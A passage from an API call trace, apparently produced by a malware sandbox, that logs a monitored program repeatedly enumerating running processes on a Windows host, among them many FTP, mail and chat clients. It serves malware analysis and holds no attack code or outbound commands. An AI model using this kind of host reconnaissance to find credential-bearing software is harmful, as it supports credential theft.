cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0209.223] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0209.224] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0209.226] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0209.227] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0209.231] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0209.233] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0209.234] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0209.236] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.237] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.239] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.240] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0209.242] CloseHandle (hObject=0x11cc) returned 1 [0209.242] Sleep (dwMilliseconds=0x64) [0209.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0209.367] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.369] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.372] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.374] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.375] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.377] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.378] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.380] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.381] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.383] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.384] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.387] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.389] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.391] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.392] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.393] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.395] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.396] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.398] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.399] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.444] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0209.445] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0209.447] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.449] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.450] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0209.452] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0209.453] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0209.455] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0209.456] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.457] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0209.459] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0209.460] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.462] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0209.463] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0209.466] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0209.468] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0209.469] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0209.471] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0209.472] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0209.473] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0209.475] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0209.476] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0209.478] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0209.535] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0209.537] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0209.538] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0209.540] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0209.541] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0209.686] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0209.688] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0209.689] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0209.691] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0209.693] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0209.694] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0209.695] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0209.697] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0209.703] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0209.704] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0209.706] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0209.708] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0209.709] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0209.711] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0209.713] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0209.719] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0209.721] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0209.723] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0209.724] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0209.726] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0209.728] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0209.764] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0209.766] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0209.768] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0209.770] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 